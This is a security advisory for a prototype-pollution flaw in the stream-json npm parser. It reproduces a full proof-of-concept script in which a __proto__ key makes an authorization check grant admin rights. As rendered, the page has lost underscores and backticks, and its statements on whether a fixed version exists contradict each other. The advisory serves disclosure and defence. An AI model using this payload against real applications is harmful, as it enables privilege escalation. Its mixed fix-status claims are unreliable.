GHSA-mjw6-4jj6-33hc: Medium severity npm/stream-json vulnerability
Summary A prototype-pollution vulnerability in stream-json lets attacker-controlled JSON replace a parsed object's prototype.
Details The streaming JSON parser (StreamValues/StreamObject/jsonc variants) writes keys via plain assignment, so a proto key replaces the parsed object's prototype with attacker-controlled content (verified 3.5.0 npm latest; native JSON.parse twin control stays clean). Parsing untrusted JSON is the contract. Assembler in Assembler.js.
PoC
Run: bash node poc-stream-json-proto-injection.mjs
Full proof-of-concept source (poc-stream-json-proto-injection.mjs): js // stream-json v3.5.0 (npm latest) — local [[Prototype]] replacement via proto keys // Class: prototype injection in a JSON deserializer (jsonparse/bser/jsonc-parser/plist family) // Root cause: Assembler builds every object as a plain Object and writes // this.current[this.key] = value (src/core/assembler.js:160,180 — plain assignment, // ToPropertyKey → inherited Object.prototype proto setter fires) // Spec baseline: JSON.parse (CreateDataProperty) → own data property, no prototype change // Run: node poc-stream-json-proto-injection.mjs (from C:/Users/rncb0/AppData/Local/Temp/0day/sj-lab) import { parser } from 'stream-json'; import jsoncParser from 'stream-json/jsonc/Parser.js'; import { streamValues } from 'stream-json/streamers/stream-values.js'; import { streamObject } from 'stream-json/streamers/stream-object.js'; import { Readable } from 'node:stream';
const sv = (input, P = parser) => new Promise((res, rej) => { const vals = []; Readable.from([input]).pipe(P.asStream()).pipe(streamValues.asStream()) .on('data', d => vals.push(d.value)).on('end', () => res(vals)).on('error', rej); }); const so = (input) => new Promise((res, rej) => { const out = {}; Readable.from([input]).pipe(parser.asStream()).pipe(streamObject.asStream()) .on('data', d => { out[d.key] = d.value; }).on('end', () => res(out)).on('error', rej); });
let pass = 0, fail = 0; const check = (name, cond) => { if (cond) { pass++; console.log( PASS ${name}); } else { fail++; console.log( FAIL ${name}); } };
const INPUT = '{"proto":{"isAdmin":true,"role":"superuser"},"name":"bob","age":30}'; const baseline = JSON.parse(INPUT); const sv1 = (await sv(INPUT))[0]; const so1 = await so(INPUT); const jc1 = (await sv(INPUT, jsoncParser))[0]; const nested = (await sv('{"user":{"proto":{"isAdmin":true},"name":"alice"}}'))[0].user; const arrProto = (await sv('{"proto":["isAdmin","role"],"name":"bob"}'))[0]; const prim = (await sv('{"proto":"x","name":"bob"}'))[0]; const ctor = (await sv('{"constructor":{"prototype":{"polluted":1}},"name":"bob"}'))[0];
console.log('== A. CORE VECTOR: proto key → parsed object [[Prototype]] replaced (read-through injection) =='); check('StreamValues: Object.keys hides proto/isAdmin (["name","age"])', JSON.stringify(Object.keys(sv1)) === '["name","age"]'); check('StreamValues: JSON.stringify hides injected props ({"name":"bob","age":30})', JSON.stringify(sv1) === '{"name":"bob","age":30}'); check('StreamValues: hasOwnProperty(isAdmin) === false (own-key allowlists pass)', !Object.prototype.hasOwnProperty.call(sv1, 'isAdmin')); check('StreamValues: obj.isAdmin === true (INHERITED read-through)', sv1.isAdmin === true); check('StreamValues: obj.role === "superuser"', sv1.role === 'superuser'); check('StreamValues: [[Prototype]] is NON-plain', Object.getPrototypeOf(sv1) !== Object.prototype); check('StreamObject: same read-through (obj.isAdmin === true)', so1.isAdmin === true && Object.keys(so1).length === 2); check('jsonc parser (comments variant): same read-through', jc1.isAdmin === true && JSON.stringify(Object.keys(jc1)) === '["name","age"]'); check('NESTED: user.isAdmin === true, own keys ["name"]', nested.isAdmin === true && JSON.stringify(Object.keys(nested)) === '["name"]');
console.log('== B. SPEC BASELINE (control): JSON.parse makes proto an OWN data key =='); check('JSON.parse: own proto key visible', Object.keys(baseline).includes('proto')); check('JSON.parse: isAdmin undefined (no read-through)', baseline.isAdmin === undefined); check('JSON.parse: [[Prototype]] stays plain', Object.getPrototypeOf(baseline) === Object.prototype);
console.log('== C. VARIANT: array-valued proto → parsed object becomes array-like =='); check('proto is attacker Array (av[0]=="isAdmin", av[1]=="role")', arrProto[0] === 'isAdmin' && arrProto[1] === 'role'); check('legit data lands at attacker-indexed position (av[2]=="bob", length 3)', arrProto[2] === 'bob' && arrProto.length === 3);
console.log('== D. FAIL-CLOSED CONTROLS =='); check('primitive proto value: no-op, plain proto (spec semantics)', Object.getPrototypeOf(prim) === Object.prototype && Object.keys(prim).length === 1); check('constructor key: harmless own prop', Object.prototype.hasOwnProperty.call(ctor, 'constructor') && ({}).polluted === undefined); check('NO GLOBAL Object.prototype pollution', ({}).polluted === undefined && ({}).isAdmin === undefined);
console.log('== E. IMPACT: auth/flag decisions read attacker values; hardened-merge bypass =='); const authorize = o => o.isAdmin === true && o.role === 'superuser'; check('authorize(stream-json obj) === true (GRANT)', authorize(sv1) === true); check('authorize(JSON.parse twin) === false (DENY — control)', authorize(baseline) === false); const target = { theme: 'light' }; for (const k in sv1) target[k] = sv1[k]; // typical naive/hardened merge (for-in) check('merge copies INHERITED isAdmin as OWN prop onto target (skip-proto sanitizer defeated)', Object.prototype.hasOwnProperty.call(target, 'isAdmin') && target.isAdmin === true); const t2 = { theme: 'light' }; for (const k in baseline) t2[k] = baseline[k]; // JSON.parse twin stays clean check('merge of JSON.parse twin has NO isAdmin (control)', !Object.prototype.hasOwnProperty.call(t2, 'isAdmin'));
console.log(\nRESULT: ${pass} PASS / ${fail} FAIL); process.exit(fail ? 1 : 0);
Observed output (verbatim, Node 24.15.0, Windows): RESULT: 21 PASS / 0 FAIL
Impact Prototype pollution (CWE-1321). Applications parsing attacker-influenced streaming JSON can have authorization checks read attacker-controlled values. Affects stream-json <= 3.5.0; no patched version exists.
---
Maintainer note on scope
The attack vector is local — stream-json's documented input is data the user owns (database dumps, exports, logs); it is not designed for JSON from the open internet, and the docs now say so. The parsed object's prototype was replaced (never the global Object.prototype); "proto": null additionally strips Object.prototype from the parsed object, so ordinary consumer code calling hasOwnProperty() throws. Assembler and FlexAssembler now create an own data property for a proto key, exactly as JSON.parse does.
---
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
npm/stream-jsonto a version that resolves this vulnerability.Fixed in 3.6.0 - Compensating control
Do not use stream-json to parse JSON from the open internet or other attacker-controlled sources; restrict its documented input to data owned and controlled by the application, such as database dumps, exports, or logs.
Event History
Frequently Asked Questions
What must an attacker be able to control to exploit this issue?
The attacker must be able to supply JSON that is parsed by the affected stream-json parser paths and includes a __proto__ key. No authentication or user interaction is indicated by the provided vector.
Which stream-json release is confirmed affected?
The issue was verified in stream-json 3.5.0, identified as the npm latest release during testing. The provided data does not define the full affected version range or a fixed version.
Does native JSON.parse behave the same way with __proto__ input?
No. The provided control test found that native JSON.parse remains clean: it creates an own data property rather than replacing the parsed object's prototype.